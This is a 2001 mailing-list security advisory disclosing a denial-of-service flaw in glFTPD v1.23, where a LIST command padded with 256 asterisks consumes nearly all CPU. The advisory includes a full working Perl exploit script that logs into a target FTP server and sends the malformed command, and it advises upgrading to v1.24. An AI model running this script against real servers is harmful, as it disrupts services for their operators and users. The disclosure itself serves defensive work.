Date: Fri, 17 Aug 2001 18:29:56 +0200
From: Jan Wagner <[email protected]>
To: [email protected]Subject: [ASGUARD-LABS] glFTPD v1.23 DOS Attack
Cc: [email protected]
-00 ASGUARD LABS ADVISORY 00-
:Summary:
Release Date : 2001-08-17
Affected : glFTPD for Linux v1.23 / glFTPD BSD v1.23 *bins
Not Affected : glFTPD for Linux v1.24 / glFTPD BSD v1.24 *bins
Attack Type : Denial Of Service
Credits to : Jan Wagner
:Description:
The glFTPD v1.23 contains a very(x2) simple D.O.S. which affects the "LIST"
Command
:Detail:
If glFTPD v1.23 receives a special formed "LIST" command it consumes about
99% of CPU power
Tested on FreeBSD 4.3 and NetBSD 1.5.1 (linux emul)
:Exploit Code:
<gl123DOS.pl>
#!/usr/bin/perl
use IO::Socket;
use Socket;
print "-= ASGUARD LABS EXPLOIT - glFTPD v1.23i =-\n\n";
if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl gl123DOS.pl <host> <user>
<pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };
$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err = "*" x 256;
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: can't connect to $adr:$prt\n";
$remote->autoflush(1);
print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: can't send user\n";
print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: can't send pass\n";
print $remote "LIST $err/\n" and print "3. Sending : ErrorCode...\n\n"or die
"Error: can't send error code\n";
print "Attack done. press any key to exit\nnote: Attack done doesn't mean
Attack successful\n";
$bla= <STDIN>;
close $remote;
:Solution:
Just update to v1.24 released two days ago
:Comments:
This Bug was very easy to find ;-) ,
glFTPD is my first choice FTP Server <BUT> Why there is STILL no Source Code
available ?
